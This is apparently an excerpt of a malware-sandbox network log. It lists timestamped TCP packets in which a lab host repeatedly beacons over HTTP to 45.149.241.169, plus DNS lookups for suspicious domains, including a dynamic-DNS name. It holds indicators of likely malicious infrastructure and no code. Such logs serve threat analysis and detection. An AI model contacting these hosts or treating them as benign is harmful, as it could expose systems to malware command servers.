Oct 3, 2024 09:22:15.417326927 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.419401884 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.428169012 CEST	80	49783	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:15.428230047 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:15.434931993 CEST	80	49783	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.293493032 CEST	80	49783	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.293625116 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.293680906 CEST	80	49783	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.293740988 CEST	49783	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.298894882 CEST	80	49783	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.432843924 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.446443081 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.446552038 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.448915005 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.459136963 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:16.459229946 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:16.464576960 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.382441044 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.382467985 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.382621050 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.382621050 CEST	49784	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.387414932 CEST	80	49784	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.524291992 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.529395103 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.529489040 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.535527945 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.541210890 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:18.541296005 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:18.546160936 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.163856983 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.163908005 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.163958073 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.163958073 CEST	49785	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.168785095 CEST	80	49785	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.311017990 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.315948963 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.316039085 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.318485975 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.323304892 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.323390961 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.328119993 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.984327078 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.984519958 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.984637976 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:19.984708071 CEST	49786	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:19.989578962 CEST	80	49786	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.127672911 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.132916927 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.133014917 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.140371084 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.145294905 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.145363092 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.150312901 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.837774992 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.837934017 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.838172913 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.838219881 CEST	49787	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.842772961 CEST	80	49787	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.979898930 CEST	49788	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.984930038 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.985060930 CEST	49788	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.987117052 CEST	49788	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.992095947 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:20.992218018 CEST	49788	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:20.997162104 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.745456934 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.745522976 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.745605946 CEST	49788	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:21.750540018 CEST	80	49788	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.884987116 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:21.890209913 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.890299082 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:21.894581079 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:21.899477005 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:21.900605917 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:21.905448914 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.564635992 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.564693928 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.564889908 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.564974070 CEST	49789	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.569890976 CEST	80	49789	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.717561960 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.723436117 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.723547935 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.725519896 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.731374025 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:22.731443882 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:22.737194061 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.426518917 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.426588058 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.426654100 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.426688910 CEST	49790	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.432070017 CEST	80	49790	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.574027061 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.579144001 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.583472967 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.585536003 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.590387106 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:23.590473890 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:23.595294952 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.372764111 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.372920036 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.373985052 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.374058962 CEST	49791	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.378030062 CEST	80	49791	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.506123066 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.511260986 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.511368990 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.513129950 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.517986059 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:24.518059969 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:24.522907972 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.207048893 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.207118034 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.207192898 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.207226038 CEST	49792	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.212157965 CEST	80	49792	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.356015921 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.361082077 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.361216068 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.363157988 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.368185997 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:25.368288040 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:25.373281956 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.051245928 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.051311016 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.051444054 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.051444054 CEST	49793	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.056641102 CEST	80	49793	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.195457935 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.200495005 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.200612068 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.202344894 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.207185030 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.207257986 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.212097883 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.870814085 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.870877028 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:26.870939016 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.870989084 CEST	49794	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:26.875900984 CEST	80	49794	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.009438038 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.014866114 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.014988899 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.017453909 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.022388935 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.022465944 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.027369976 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.946026087 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.946084976 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:27.946191072 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.946245909 CEST	49795	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:27.950982094 CEST	80	49795	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.104796886 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.110049963 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.110129118 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.112184048 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.117260933 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.117331028 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.122212887 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.768294096 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.768353939 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.768532991 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.768577099 CEST	49796	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.773427010 CEST	80	49796	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.915775061 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.920845032 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.920944929 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.922904015 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.927774906 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:28.927858114 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:28.932878017 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.580168962 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.580351114 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.580671072 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.580728054 CEST	49797	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.585336924 CEST	80	49797	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.734622002 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.739700079 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.739845037 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.741869926 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.746881962 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:29.746973038 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:29.751835108 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.493874073 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.493899107 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.494085073 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.494191885 CEST	49798	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.499155045 CEST	80	49798	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.642625093 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.647440910 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.647519112 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.649540901 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.654344082 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:30.654397011 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:30.659251928 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.469435930 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.469497919 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.469549894 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.469549894 CEST	49799	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.474478960 CEST	80	49799	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.620973110 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.626020908 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.626152992 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.628278971 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.633156061 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:31.633255959 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:31.638143063 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.287770987 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.287904978 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.287997961 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.291906118 CEST	49800	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.296880007 CEST	80	49800	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.589555979 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.752104044 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.752338886 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.754582882 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.759432077 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:32.759509087 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:32.764318943 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.477503061 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.477701902 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.477823019 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.478122950 CEST	49801	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.482940912 CEST	80	49801	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.624550104 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.629590988 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.629717112 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.631897926 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.636739016 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:33.636826038 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:33.641805887 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.399502039 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.399748087 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.400048971 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.400048971 CEST	49802	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.404989958 CEST	80	49802	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.552184105 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.559056997 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.559149027 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.561244965 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.567374945 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:34.567445993 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:34.573415995 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.265968084 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.266083002 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.266278028 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.266278982 CEST	49803	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.271094084 CEST	80	49803	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.399912119 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.404871941 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.404987097 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.407145977 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.411952972 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:35.412081957 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:35.416852951 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.047740936 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.047781944 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.047866106 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.047908068 CEST	49804	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.052803993 CEST	80	49804	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.182019949 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.188112020 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.188338995 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.190355062 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.195821047 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.196016073 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.201155901 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.840380907 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.840523958 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.840708017 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.840755939 CEST	49805	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.845617056 CEST	80	49805	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.984582901 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.990446091 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.990598917 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.993830919 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:36.998756886 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:36.999089003 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.004026890 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.715905905 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.716250896 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.716289997 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.716448069 CEST	49806	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.721157074 CEST	80	49806	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.857374907 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.862395048 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.862495899 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.864594936 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.869488001 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:37.869566917 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:37.874440908 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.206928015 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.206954956 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.207040071 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.207582951 CEST	49807	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.212403059 CEST	80	49807	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.369167089 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.374332905 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.374485970 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.381808996 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.386639118 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:40.386730909 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:40.391565084 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.026272058 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.026294947 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.026370049 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.026370049 CEST	49808	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.031299114 CEST	80	49808	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.169219017 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.273029089 CEST	80	49809	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.273348093 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.275152922 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.280455112 CEST	80	49809	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.280592918 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.285872936 CEST	80	49809	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.948029995 CEST	80	49809	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.948054075 CEST	80	49809	45.149.241.169	192.168.2.10
Oct 3, 2024 09:22:41.948129892 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.948183060 CEST	49809	80	192.168.2.10	45.149.241.169
Oct 3, 2024 09:22:41.953120947 CEST	80	49809	45.149.241.169	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:40.835608006 CEST	55372	53	192.168.2.10	1.1.1.1
Oct 3, 2024 09:20:40.848423004 CEST	53	55372	1.1.1.1	192.168.2.10
Oct 3, 2024 09:20:46.675252914 CEST	61894	53	192.168.2.10	1.1.1.1
Oct 3, 2024 09:20:46.689939976 CEST	53	61894	1.1.1.1	192.168.2.10
Oct 3, 2024 09:21:46.617948055 CEST	60224	53	192.168.2.10	1.1.1.1
Oct 3, 2024 09:21:46.627782106 CEST	53	60224	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:40.835608006 CEST	192.168.2.10	1.1.1.1	0x7b9	Standard query (0)	www.sodiumlaurethsulfatedesyroyer.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:46.675252914 CEST	192.168.2.10	1.1.1.1	0xc7b	Standard query (0)	freighteighttwocam.ddns.net	A (IP address)	IN (0x0001)	false
